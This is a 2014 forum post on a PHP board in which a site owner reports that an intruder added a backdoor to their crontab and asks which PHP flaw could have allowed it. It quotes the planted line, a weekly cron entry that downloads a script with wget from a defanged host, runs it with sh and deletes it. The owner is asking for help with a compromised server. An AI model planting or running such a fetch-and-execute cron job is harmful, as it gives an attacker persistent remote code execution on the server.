作者averywu (看文不要只会用横的看)
看板PHP
标题Fw: [问题] 被植入後门
时间Wed Oct 1 11:19:10 2014
我的站台的crontab 被写入
@weekly wget
http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1
目前已知不影响主机,因为URL已经失效了。
PS.贴出来的URL已经处理过了,domain我改成x,以防被误点。
但实在找不出他植入的方法,有人知道吗?
PHP是否有什麽漏洞能让入侵者植入这个script吗?
--
小恶魔的家
http://blog.pixnet.net/shiuju/
--
※ 编辑: averywu (60.251.237.155), 10/01/2014 11:20:00
1F:→ mmis1000: 版本?记得旧版之前有爆出大洞? 10/01 12:35
2F:→ averywu: PHP版本是5.3 10/02 10:27